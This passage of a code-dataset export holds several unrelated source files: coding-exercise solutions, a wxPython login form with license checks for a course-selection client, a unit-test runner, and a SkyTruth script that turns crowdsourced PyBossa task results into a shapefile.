number of nodes\n while (node.next != None):\n node = node.next\n count += 1\n # find index of middle node\n index = 0\n if count % 2 == 0:\n index = count / 2\n else:\n index= count / 2 + 1\n node = head\n # get middle node\n for i in range(int(index)):\n node = node.next\n return node\n","sub_path":"0. Easy/0876. Middle of the Linked List/middle.py","file_name":"middle.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"312536549","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Author: kerlomz \nimport tkinter\nfrom wx import *\nfrom utils import *\nfrom service import *\nimport menu as m\nfrom auth_dialog import LicenseFrame\nfrom core import Core\nfrom google_rpc import GoogleRPC\n\n\nclass LoginFrame(Frame):\n \"\"\" Login Form \"\"\"\n\n def __init__(self, parent=None, _type=-1, update_ui=None, service=None):\n\n Frame.__init__(self, parent)\n # self.core = Core()\n self.Size = (340, 200)\n self.GUI = GUI(self, SystemConfig.LANGUAGE)\n self.UpdateUI = update_ui\n self.Centre()\n self.AppLogo = Icon(System.resource_path(StaticPath.System.APP_ICON_PATH), BITMAP_TYPE_ICO)\n self.SetIcon(self.AppLogo)\n self.status_bar = self.CreateStatusBar()\n self.Service = service\n self.Service.init(self, self.GUI, self.status_bar)\n self.default_certificate = ['', '']\n self.init_conf()\n self.init()\n\n def init_conf(self):\n decrypted_login_info = RSAUtils.decrypt(LOGIN_INFO, decode=False, local=True)\n default_certificate = Cache.open(decrypted_login_info) if decrypted_login_info else ['', '']\n dynamic_code = Cache.open(RSAUtils.decrypt(DYNAMIC_CODE, decode=False, local=True))\n last_csrf = Cache.open(RSAUtils.decrypt(LAST_CSRF, decode=False, local=True))\n self.default_certificate = default_certificate if default_certificate else self.default_certificate\n self.Service.set_login(self.default_certificate[0], self.default_certificate[1], dynamic_code)\n self.Service.csrf_token = last_csrf if last_csrf else {\n \"Login\": '',\n \"GeneralElectiveCourseList\": '',\n \"GeneralElectiveCoursePost\": '',\n \"CompulsoryCoursePage\": '',\n \"CompulsoryCourseList\": '',\n \"CompulsoryCoursePost\": '',\n }\n\n def init(self):\n \"\"\" Init Form \"\"\"\n self.Title = self.GUI.text(UI.Login.TITLE, SystemConfig.CLIENT_VER)\n panel = Panel(self, NewId())\n\n rect = self.GetClientRect()\n\n label_text = [self.GUI.text(UI.Login.LABEL_ID), self.GUI.text(UI.Login.LABEL_PWD)]\n\n label_widget = [StaticText(\n panel,\n label=text,\n pos=(rect[0] + 15, rect[1] + 15 + i * 35),\n ) for i, text, in enumerate(label_text)]\n\n rect = label_widget[0].Rect\n entry_style = [TE_LEFT | TE_PROCESS_ENTER, TE_PASSWORD | TE_PROCESS_ENTER]\n entry_widget = [TextCtrl(\n panel,\n size=(190, -1),\n pos=(rect[0] + 70, rect[1] - 3 + i * 35),\n style=style\n ) for i, style, in enumerate(entry_style)]\n\n student_code, password = entry_widget[0], entry_widget[1]\n\n student_code.SetValue(self.default_certificate[0])\n password.SetValue(self.default_certificate[1])\n\n if student_code.GetValue():\n password.SetFocus()\n\n rect = entry_widget[1].Rect\n button_submit = Button(\n panel,\n label=self.GUI.text(UI.Login.BUTTON_SUBMIT),\n size=(90, 25),\n pos=(rect[0] + 100, rect[1] + 35)\n )\n\n check_remember = CheckBox(\n panel,\n NewId(),\n label=self.GUI.text(UI.Login.CHECK_BOX_REMEMBER),\n pos=(rect[0] - 70, rect[1] + 40)\n )\n check_remember.SetValue(UserConfig.REMEMBER)\n\n check_remember.Bind(\n EVT_CHECKBOX,\n lambda x: 
ConfigIO.update('System', 'Remember', check_remember.Value),\n check_remember\n )\n\n def submit(e):\n uid = entry_widget[0].GetValue()\n pwd = entry_widget[1].GetValue()\n self.Service.set_login(uid, pwd)\n stu_code = self.Service.student_code\n print(stu_code)\n auth_code = Core.machine_code_auth(\n stu_code=stu_code,\n c_volume_serial_number=Core.c_volume_serial_number(),\n mac_addr=Core.mac_addr(),\n hostname=Core.hostname()\n )\n if check_remember.IsChecked():\n ConfigIO.update(\n \"Certificate\",\n \"Account\",\n value=RSAUtils.encrypt(Cache.save([uid, pwd]), local=True)\n )\n if auth_code != LICENSE.get(stu_code):\n LicenseFrame(tkinter.Tk(), stu_code=stu_code)\n GUI.alert_error(\n self.GUI.text(UI.Main.Dialog.Error.TITLE),\n self.GUI.text(Msg.Main.LICENSE_ERROR)\n )\n exit(-999)\n\n resp_context = GoogleRPC.verify(stu_code=stu_code)\n if not resp_context or not resp_context.get('success'):\n GUI.alert_error(\n self.GUI.text(UI.Main.Dialog.Error.TITLE),\n self.GUI.text(Msg.Main.LICENSE_ERROR)\n )\n exit(-1)\n raw_cookie = Cache.open(RSAUtils.decrypt(SESSION, decode=False, local=True))\n\n logged_in = self.Service.login_validate(raw_cookie=raw_cookie)\n if logged_in:\n print('状态: Cookie 有效')\n self.Service.agreement_status = True\n resp = {\"message\": None, \"status\": True}\n else:\n resp = self.Service.login_base()\n\n # TODO 上报切换账号\n if self.default_certificate[0] != '' and uid != self.default_certificate[0]:\n print('切换账号预警')\n\n if not UserConfig.COURSE_DATA and NEED_AGREEMENT:\n self.Service.agreement()\n else:\n self.Service.update_general_elective_courses()\n\n if resp['status']:\n # TODO 网络验证,是否有许可\n\n if check_remember.IsChecked():\n ConfigIO.update(\n \"Certificate\",\n \"Account\",\n value=RSAUtils.encrypt(Cache.save([uid, pwd]), local=True)\n )\n else:\n pass\n self.UpdateUI(2)\n else:\n self.status_bar.SetStatusText(\n self.GUI.text(Msg.Login.LOGIN_FAILED, resp['message'])\n )\n return\n\n self.Bind(EVT_BUTTON, submit, button_submit)\n self.Bind(EVT_TEXT_ENTER, submit, password)\n self.GUI.build_menu(self, m.MenuWidget(self, self.Service).menu_data(False))\n","sub_path":"forms/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"195897512","text":"import unittest\nimport os\nimport sys\nfrom datetime import datetime\nimport time\n\nsys.path.append(os.path.join(os.environ[\"ANSYSEM_ROOT211\"],\"PythonFiles\",\"DesktopPlugin\"))\npath_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"..\")\nsys.path.append(path_dir)\n\nos.environ[\"UNITTEST_CURRENT_TEST\"] = \"1\"\nrun_dir = os.path.abspath(os.path.dirname(__file__))\nprint(run_dir)\n\ndef discover_and_run(start_dir, pattern=None):\n \"\"\"Discover and run tests cases, returning the result.\"\"\"\n # use the default shared TestLoader instance\n test_loader = unittest.defaultTestLoader\n\n # automatically discover all tests\n test_suite = test_loader.discover(start_dir, pattern=pattern)\n\n # run the test suite\n log_file = os.path.join(start_dir, 'runner_unittest.log')\n with open(log_file, \"w\") as f:\n f.write(\"Test started {}\\n\".format(datetime.now()))\n runner = unittest.TextTestRunner(f, verbosity=2)\n result = runner.run(test_suite)\n\n\ndiscover_and_run(run_dir, pattern='test_*.py')\n\nsuccess_file = os.path.join(run_dir, 'tests_succeeded.log')\nwith open(success_file, \"w\") as f:\n 
f.write(\"ok\")\n","sub_path":"_unittest_ironpython/run_unittests.py","file_name":"run_unittests.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"63015921","text":"# 基因組合是 A C G T,分別的 factor 為 1-4\n# S 為 string,代表一串基因序列。長度為 N 個 ex: S = \"CAGCCTA\"\n# P array 指的是開頭第 X 個基因,總共 M 個數字 ex: P = [2, 5, 0]\n# Q array 指的是結尾第 X 個基因,總共 M 個數字 ex: Q = [4, 5, 6]\n# 位置上來說 P[K] <= Q[K]\n# 計算每一對 (P, Q) 中最小的 factor\n# ex: (P[0], Q[0]) --> (2, 4) index 2~4 的字串為 GCC,那最小 factor 為 2\n# ex: (P[1], Q[1]) --> (5, 5) index 5 的字串為 T,那最小 factor 為 4\n# ex: (P[2], Q[2]) --> (0, 6) index 0~6 的字串為整串 S,那最小 factor 為 1\n# result 要回傳一個 array 格式:[2, 4, 1]\n\nimport sys\n\ndef solution(S, P, Q):\n \n len_result = len(P)\n len_S = len(S)\n S_factor = []\n result = [0] * len_result\n\n # factor\n # A --> 1; C --> 2; G --> 3; T --> 4; \n for i in S:\n if i == 'A':\n S_factor.append(1)\n elif i == 'C':\n S_factor.append(2) \n elif i == 'G':\n S_factor.append(3)\n elif i == 'T': # T\n S_factor.append(4)\n else:\n sys.exit(1)\n\n\n print(\"S is \", S_factor)\n # the answer is S itself\n if len_S == 1:\n print(\"the answer is S\")\n print(S_factor)\n return S_factor\n exit(0)\n\n else:\n # read (P, Q) pair\n for i in range (0, len_result):\n\n # the factor is [1-4]\n min_factor = 5\n index_start = P[i]\n index_end = Q[i]\n\n print(\"i:\", i, \"; index_start:\", index_start, \"; index_end:\", index_end)\n print(\"===============\")\n \n # find the minmum factor\n if index_start == index_end:\n result[i] = S_factor[index_start]\n print(\"don't need to compare\")\n print(\"the \", i, \" of result is \", int(S_factor[index_start]))\n print(\"result \", result)\n print(\"----------------------------------\")\n else:\n for n in range(index_start, (index_end+1)):\n # factor 1 是最小的,因此找到 1 後不需要繼續往下找,並且離開 for-loop\n if S_factor[n] == 1:\n result[i] = min_factor\n min_factor = S_factor[n]\n print(\"find the minmun and break for-loop\")\n print(\"the \", i, \" of result is \", min_factor)\n print(\"----------------------------------\")\n break\n elif S_factor[n] < min_factor:\n min_factor = S_factor[n]\n print(\"min_factor:\", min_factor)\n result[i] = min_factor\n print(\"result \", result)\n\n print(\"end of search\")\n print(\"the result is \", result)\n return result\n\n\nS = \"CAGCCTA\"\nP = [2, 5, 0, 3]\nQ = [4, 5, 6, 5]\n\n'''\nS = \"T\"\nP = [0]\nQ = [0]\n'''\nsolution(S, P, Q)","sub_path":"Lesson5/GenomicRangeQuery.py","file_name":"GenomicRangeQuery.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"488059029","text":"#!/usr/bin/env python\n\n\n# This document is part of CrowdProjects\n# https://github.com/skytruth/CrowdProjects\n\n\n# =========================================================================== #\n#\n# Copyright (c) 2014, SkyTruth\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the {organization} nor the names of its\n# 
contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n#\n# =========================================================================== #\n\n\n\"\"\"\nConvert a FrackFinder OH Tadpole 2014 JSON export to a shapefile\ncontaining 1 point per input task and aggregated crowd response\nmetrics.\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport sys\nimport json\nfrom os.path import *\nfrom pprint import pprint\ntry:\n from osgeo import ogr\n from osgeo import osr\nexcept ImportError:\n import ogr\n import osr\n\n\n#/* ======================================================================= */#\n#/* Build Information\n#/* ======================================================================= */#\n\n__author__ = 'Kevin Wurster'\n__version__ = '0.1'\n__release__ = '2014/09/09'\n__docname__ = basename(__file__)\n__license__ = \"\"\"\nCopyright (c) 2014, SkyTruth\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n* Neither the name of the {organization} nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n\n#/* ======================================================================= */#\n#/* Define print_usage() function\n#/* ======================================================================= */#\n\ndef print_usage():\n\n \"\"\"\n Command line usage information\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(\"\"\"\nUsage: %s [options] task.json task_run.json outfile.shp\n\nOptions:\n --class=str Add a field containing a value, or use %%str to get a field from the JSON\n --help-info Print out a list of help related flags\n --of=driver Output driver name/file type - default='ESRI Shapefile'\n --epsg=int EPSG code for coordinates in task.json - default='4326'\n --overwrite Overwrite the output file\n\"\"\" % __docname__)\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define print_license() function\n#/* ======================================================================= */#\n\ndef print_license():\n\n \"\"\"\n Print out license information\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(__license__)\n\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define print_help() function\n#/* ======================================================================= */#\n\ndef print_help():\n\n \"\"\"\n Detailed help information\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(\"\"\"\nHelp: {0}\n------{1}\nPyBossa exports tasks in two ways: task.json and task_run.json This utility\nlooks at each task in task.json and sifts through its matching task_run.json\nto calculate a variety of metrics, like how many times the task was shown,\nhow many times the crowd, how many times the crowd picked each possible answer,\nand how confident the crowd was in its decision.\n\nIt is possible for the crowd to be split and pick two different choices an\nequal number of times. 
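
A tiny worked example of the tie case just described — this is a simplified stand-in for the `get_crowd_selection()` function defined later in this script, not the function itself:

```python
# Majority vote with ties joined by '|', mirroring get_crowd_selection() below.
def crowd_selection(counts, names):
    top = max(counts.values())
    if top == 0:
        return None
    return '|'.join(names[k] for k, v in counts.items() if v == top)

counts = {'n_pad_res': 4, 'n_nop_res': 4, 'n_unk_res': 1}
names = {'n_pad_res': 'pad', 'n_nop_res': 'nopad', 'n_unk_res': 'unknown'}
print(crowd_selection(counts, names))  # -> 'pad|nopad': a split (tied) crowd
```
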
The output for these cases is pipe delimited.\n \"\"\".format(__docname__, '-' * len(__docname__)))\n\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define print_help_info() function\n#/* ======================================================================= */#\n\ndef print_help_info():\n\n \"\"\"\n Print a list of help related flags\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(\"\"\"\nHelp flags:\n --help More detailed description of this utility\n --usage Arguments, parameters, flags, options, etc.\n --version Version and ownership information\n --license License information\n \"\"\")\n\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define print_version() function\n#/* ======================================================================= */#\n\ndef print_version():\n\n \"\"\"\n Print script version information\n\n :return: 1 for exit code purposes\n :rtype: int\n \"\"\"\n\n print(\"\"\"\n%s version %s - released %s\n \"\"\" % (__docname__, __version__, __release__))\n\n return 1\n\n\n#/* ======================================================================= */#\n#/* Define get_crowd_selection() function\n#/* ======================================================================= */#\n\ndef get_crowd_selection(selection_count, selection_map):\n\n \"\"\"\n Figure out what the crowd actually selected\n\n :param selection_count: the number of responses for each selection\n :type selection_count: dict\n :param selection_map: maps output file fields to selections\n :type selection_map: dict\n\n :return: the crowd's selection for a given group of selections or None\n :rtype: str|unicode|None\n \"\"\"\n\n # Cache containers\n crowd_selection = 'NONE'\n\n # Figure out what the maximum number of selections was\n max_selection = max(selection_count.values())\n\n # Build the crowd_selection\n if max_selection is 0:\n crowd_selection = None\n else:\n for selection, count in selection_count.iteritems():\n if count is max_selection:\n if crowd_selection == 'NONE':\n crowd_selection = selection_map[selection]\n else:\n crowd_selection += '|' + selection_map[selection]\n\n # Return to user\n return crowd_selection\n\n\n#/* ======================================================================= */#\n#/* Define get_crowd_selection_counts() function\n#/* ======================================================================= */#\n\ndef get_crowd_selection_counts(input_id, task_runs_json_object):\n\n \"\"\"\n Figure out how many times the crowd selected each option\n\n :param input_id: the id for a given task\n :type input_id: int\n :param task_runs_json_object: all of the input task_runs from json.load(open('task_run.json'))\n :type task_runs_json_object: list\n\n :return: number of responses for each selection\n :rtype: dict\n \"\"\"\n\n counts = {'n_nop_res': 0,\n 'n_unk_res': 0,\n 'n_pad_res': 0,\n 'ERROR': 0}\n for task_run in task_runs_json_object:\n if input_id == task_run['task_id']:\n try:\n selection = task_run['info']['selection']\n except KeyError:\n selection = 'ERROR'\n if selection == 'nopad':\n counts['n_nop_res'] += 1\n elif selection == 'unknown':\n counts['n_unk_res'] += 1\n elif selection == 'pad':\n counts['n_pad_res'] += 1\n else:\n counts['ERROR'] += 1\n return counts\n\n\n#/* ======================================================================= */#\n#/* Define get_percent_crowd_agreement() function\n#/* 
======================================================================= */#\n\ndef get_percent_crowd_agreement(crowd_selection, selection_counts, total_responses, map_selection_field,\n error_val=None):\n\n \"\"\"\n Figure out how well the crowd agreed and if two answers tied, figure out the agreement for both\n\n :param crowd_selection: the winning selection for a given task\n :type crowd_selection: str|unicode|None\n :param selection_counts: number of responses for each count\n :type selection_counts: dict\n :param total_responses: total number of responses\n :type total_responses: int\n :param map_selection_field: maps selections to output file field names\n :type map_selection_field: dict\n :param error_val: set crowd agreement to this value if any errors are encountered\n :type error_val: str|unicode|None\n\n :return: percent crowd agreement and percent crowd agreement\n :rtype: dict\n \"\"\"\n\n # Compute crowd agreement\n # The try/except blocks are for situations where tasks have never been viewed, which yields zero total_responses\n per_crowd_agreement = None\n split_per_crowd_agreement = None\n\n # Make sure the crowd actually made a selection\n if crowd_selection is None:\n per_crowd_agreement = None\n split_per_crowd_agreement = None\n elif total_responses is 0:\n per_crowd_agreement = error_val\n split_per_crowd_agreement = error_val\n else:\n if '|' not in crowd_selection:\n try:\n per_crowd_agreement = int(selection_counts[map_selection_field[crowd_selection]] * 100 / total_responses)\n except ZeroDivisionError:\n per_crowd_agreement = error_val\n else:\n\n # Compute percent agreement for each split response\n for selection in crowd_selection.split('|'):\n field_name = map_selection_field[selection]\n selection_count = selection_counts[field_name]\n try:\n per_crowd_agreement = int(selection_count * 100 / total_responses)\n except ZeroDivisionError:\n per_crowd_agreement = error_val\n if split_per_crowd_agreement is None:\n split_per_crowd_agreement = unicode(per_crowd_agreement)\n else:\n split_per_crowd_agreement += '|' + unicode(per_crowd_agreement)\n\n # Make sure the percent crowd agreement field is None when there is a split response\n per_crowd_agreement = error_val\n return {'p_crd_a': per_crowd_agreement, 'p_s_crd_a': split_per_crowd_agreement}\n\n\n#/* ======================================================================= */#\n#/* Define main() function\n#/* ======================================================================= */#\n\ndef main(args):\n\n \"\"\"\n Main routine\n\n :param args: arguments from the commandline (sys.argv[1:] in order to drop the script name)\n :type args: list\n\n :return: 0 on success and 1 on error\n :rtype: int\n \"\"\"\n\n #/* ======================================================================= */#\n #/* Defaults\n #/* ======================================================================= */#\n\n # OGR defaults\n outfile_driver = 'ESRI Shapefile'\n outfile_epsg_code = 4326\n\n # Output file\n overwrite_outfile = False\n\n #/* ======================================================================= */#\n #/* Containers\n #/* ======================================================================= */#\n\n # Input/output files\n classification = None\n tasks_file = None\n task_runs_file = None\n outfile = None\n\n # Map field names to selections\n map_field_to_selection = {'n_nop_res': 'nopad',\n 'n_unk_res': 'unknown',\n 'n_pad_res': 'pad',\n 'ERROR': 'ERROR'}\n\n # Map selections to field names\n map_selection_to_field = 
{'nopad': 'n_nop_res',\n 'unknown': 'n_unk_res',\n 'pad': 'n_pad_res',\n 'ERROR': 'ERROR'}\n\n #/* ======================================================================= */#\n #/* Defaults\n #/* ======================================================================= */#\n\n arg_error = False\n for arg in args:\n\n # Help arguments\n if arg in ('--license', '-license'):\n return print_license()\n elif arg in ('--usage', '-usage'):\n return print_usage()\n elif arg in ('--version', '-version'):\n return print_version()\n elif arg in ('--help', '-help'):\n return print_help()\n elif arg in ('--help-info', '-help-info', '--helpinfo', '--helpinfo'):\n return print_help_info()\n\n # OGR configuration\n elif '--of=' in arg:\n outfile_driver = arg.split('=', 1)[1]\n elif '--epsg=' in arg:\n outfile_epsg_code = arg.split('=', 1)[1]\n\n # Processing options\n elif '--class=' in arg:\n classification = arg.split('=', 1)[1]\n\n # Additional options\n elif arg == '--overwrite':\n overwrite_outfile = True\n\n # Positional arguments and errors\n else:\n\n # Catch task.json file\n if tasks_file is None:\n tasks_file = abspath(arg)\n\n # Catch task_run.json file\n elif task_runs_file is None:\n task_runs_file = abspath(arg)\n\n # Catch output file\n elif outfile is None:\n outfile = abspath(arg)\n\n # Catch unrecognized arguments\n else:\n print(\"ERROR: Invalid argument: %s\" % arg)\n arg_error = True\n\n #/* ======================================================================= */#\n #/* Validate Parameters\n #/* ======================================================================= */#\n\n bail = False\n\n # Check arguments\n if arg_error:\n print(\"ERROR: Did not successfully parse arguments\")\n bail = True\n\n # Check input task.json file\n if tasks_file is None:\n bail = True\n print(\"ERROR: Need a task file\")\n elif not isfile(tasks_file) or not os.access(tasks_file, os.R_OK):\n bail = True\n print(\"ERROR: Can't access file: %s\" % tasks_file)\n\n # Check input task_run.json file\n if task_runs_file is None:\n bail = True\n print(\"ERROR: Need a task run file\")\n elif not isfile(task_runs_file) or not os.access(task_runs_file, os.R_OK):\n bail = True\n print(\"ERROR: Can't access task run file: %s\" % task_runs_file)\n\n # Check output file\n if outfile is None:\n bail = True\n print(\"ERROR: Need an output file\")\n elif not isdir(dirname(outfile)) and not os.access(dirname(outfile), os.W_OK):\n bail = True\n print(\"ERROR: Need write permission: %s\" % dirname(outfile))\n elif not overwrite_outfile and isfile(outfile):\n bail = True\n print(\"ERROR: Output file exists and overwrite=%s: %s\" % (str(overwrite_outfile), outfile))\n\n # Check EPSG code\n try:\n outfile_epsg_code = int(outfile_epsg_code)\n except ValueError:\n bail = True\n print(\"ERROR: Invalid EPSG code - must be an int: %s\" % str(outfile_epsg_code))\n\n if bail:\n return 1\n\n #/* ======================================================================= */#\n #/* Load JSON Data\n #/* ======================================================================= */#\n\n # Load task.json file into a JSON object\n print(\"Loading task file...\")\n with open(tasks_file, 'r') as f:\n tasks_json = json.load(f)\n print(\"Found %s items\" % str(len(tasks_json)))\n\n # Load task_run.json file into a JSON object\n print(\"Loading task run file...\")\n with open(task_runs_file, 'r') as f:\n task_runs_json = json.load(f)\n print(\"Found %s items\" % str(len(task_runs_json)))\n\n #/* 
======================================================================= */#\n #/* Create Output OGR Datasource/Layer/Definitions/etc.\n #/* ======================================================================= */#\n\n # Get driver and make sure its valid\n driver = ogr.GetDriverByName(str(outfile_driver))\n if driver is None:\n print(\"ERROR: Invalid OGR driver: %s\" % outfile_driver)\n return 1\n\n # Overwrite output file if it exists then create new datasource\n if isfile(outfile):\n print(\"Overwriting output file: %s\" % outfile)\n driver.DeleteDataSource(outfile)\n print(\"Creating output file: %s\" % outfile)\n data_source = driver.CreateDataSource(outfile)\n\n # Define SRS\n print(\"Defining SRS ...\")\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(outfile_epsg_code)\n\n # Create layer\n print(\"Creating layer ...\")\n layer_name = basename(outfile).split('.')\n layer_name = ''.join(layer_name[:len(layer_name) - 1])\n layer = data_source.CreateLayer(str(layer_name), srs, ogr.wkbPoint)\n\n # Define fields\n print(\"Defining fields ...\")\n fields_definitions = [('id', 10, ogr.OFTInteger),\n ('site_id', 254, ogr.OFTString),\n ('wms_url', 254, ogr.OFTString),\n ('wms_id', 254, ogr.OFTString),\n ('wms_v', 254, ogr.OFTString),\n ('county', 254, ogr.OFTString),\n ('state', 254, ogr.OFTString),\n ('year', 10, ogr.OFTInteger),\n ('location', 254, ogr.OFTString),\n ('n_unk_res', 10, ogr.OFTInteger),\n ('n_nop_res', 10, ogr.OFTInteger),\n ('n_pad_res', 10, ogr.OFTInteger),\n ('n_tot_res', 10, ogr.OFTInteger),\n ('crowd_sel', 254, ogr.OFTString),\n ('qaqc', 254, ogr.OFTString),\n ('p_crd_a', 10, ogr.OFTReal),\n ('p_s_crd_a', 254, ogr.OFTString)]\n\n # Add extra fields\n if classification is not None:\n fields_definitions.append(('class', 254, ogr.OFTString))\n\n # Create fields\n for field in fields_definitions:\n field_name = field[0]\n field_width = field[1]\n field_type = field[2]\n print(\" \" + field_name)\n field_object = ogr.FieldDefn(str(field_name), field_type)\n field_object.SetWidth(field_width)\n layer.CreateField(field_object)\n\n #/* ======================================================================= */#\n #/* Analyze task.json Content\n #/* ======================================================================= */#\n\n # Loop through all task.json tasks\n len_tasks_json = len(tasks_json)\n i = 0\n print(\"Analyzing tasks ...\")\n for task in tasks_json:\n\n # Update user\n i += 1\n sys.stdout.write(\"\\r\\x1b[K\" + \" %s/%s\" % (i, len_tasks_json))\n sys.stdout.flush()\n\n # Cache some information\n input_task_id = task['id']\n task_location = '%s,%s,%s' % (task['info']['latitude'], task['info']['longitude'], task['info']['year'])\n\n # Get initial set of attributes from task body\n # First value in the tuple goes into task_attributes, and second references the info block within the task\n # The third value in the tuple is the type object to be used\n task_attributes = {'location': task_location}\n initial_task_grab = [('id', 'id', int),\n ('latitude', 'latitude', unicode),\n ('longitude', 'longitude', unicode),\n ('wms_url', 'url', unicode),\n ('county', 'county', unicode),\n ('state', 'state', unicode),\n ('site_id', 'siteID', unicode),\n ('year', 'year', unicode)]\n\n for attributes in initial_task_grab:\n attribute_name = attributes[0]\n info_reference = attributes[1]\n type_caster = attributes[2]\n try:\n task_attributes[attribute_name] = type_caster(task['info'][info_reference])\n except (TypeError, KeyError):\n task_attributes[attribute_name] = None\n\n # Task 
identification\n task_attributes['id'] = int(task['id'])\n\n # Get the WMS version\n task_attributes['wms_v'] = unicode(task['info']['options']['version'])\n task_attributes['wms_id'] = unicode(task['info']['options']['layers'])\n\n # Get the crowd selection counts\n crowd_selection_counts = get_crowd_selection_counts(input_task_id, task_runs_json)\n task_attributes = dict(task_attributes.items() + crowd_selection_counts.items())\n\n # Figure out what the crowd actually selected and the total number of responses\n n_tot_res = int(sum(crowd_selection_counts.values()))\n task_attributes['n_tot_res'] = n_tot_res\n crowd_selection = get_crowd_selection(crowd_selection_counts, map_field_to_selection)\n task_attributes['crowd_sel'] = crowd_selection\n\n # Get crowd agreement levels\n task_attributes = dict(task_attributes.items()\n + get_percent_crowd_agreement(task_attributes['crowd_sel'], crowd_selection_counts,\n n_tot_res, map_selection_to_field).items())\n\n # Create the feature\n feature = ogr.Feature(layer.GetLayerDefn())\n field_values = [('id', task_attributes['id']),\n ('site_id', task_attributes['site_id']),\n ('wms_url', task_attributes['wms_url']),\n ('wms_id', task_attributes['wms_id']),\n ('wms_v', task_attributes['wms_v']),\n ('county', task_attributes['county']),\n ('state', task_attributes['state']),\n ('year', task_attributes['year']),\n ('location', task_attributes['location']),\n ('n_unk_res', task_attributes['n_unk_res']),\n ('n_nop_res', task_attributes['n_nop_res']),\n ('n_pad_res', task_attributes['n_pad_res']),\n ('n_tot_res', task_attributes['n_tot_res']),\n ('crowd_sel', task_attributes['crowd_sel']),\n ('p_crd_a', task_attributes['p_crd_a']),\n ('p_s_crd_a', task_attributes['p_s_crd_a'])]\n\n # Set values for additional fields\n if classification is not None:\n if classification[0] == '%':\n field_values.append(('class', unicode([classification[1:]])))\n else:\n field_values.append(('class', unicode(classification)))\n\n # Populate fields\n for field, value in field_values:\n feature.SetField2(str(field), value)\n wkt = \"POINT(%f %f)\" % (float(task_attributes['longitude']), float(task_attributes['latitude']))\n point = ogr.CreateGeometryFromWkt(wkt)\n feature.SetGeometry(point)\n layer.CreateFeature(feature)\n\n # Cleanup feature\n feature = None\n\n #/* ======================================================================= */#\n #/* Cleanup\n #/* ======================================================================= */#\n\n # Destroy OGR objects\n data_source = None\n layer = None\n\n # Success\n print(\" - Done.\")\n return 0\n\n\n#/* ======================================================================= */#\n#/* Commandline Execution\n#/* ======================================================================= */#\n\nif __name__ == '__main__':\n\n # Not enough arguments - print usage\n if len(sys.argv) is 1:\n sys.exit(print_usage())\n\n # Got enough arguments - give all but the first to the main() function\n else:\n sys.exit(main(sys.argv[1:]))\n","sub_path":"Data/FrackFinder/OH/2014/Tadpole/bin/task2shp.py","file_name":"task2shp.py","file_ext":"py","file_size_in_byte":25566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"414073780","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 24 15:10:37 2019\n\n@author: ppxee\n\"\"\"\n\n### Import required libraries ###\nimport matplotlib.pyplot as plt #for plotting\nfrom astropy.io import fits #for handling fits\nfrom 
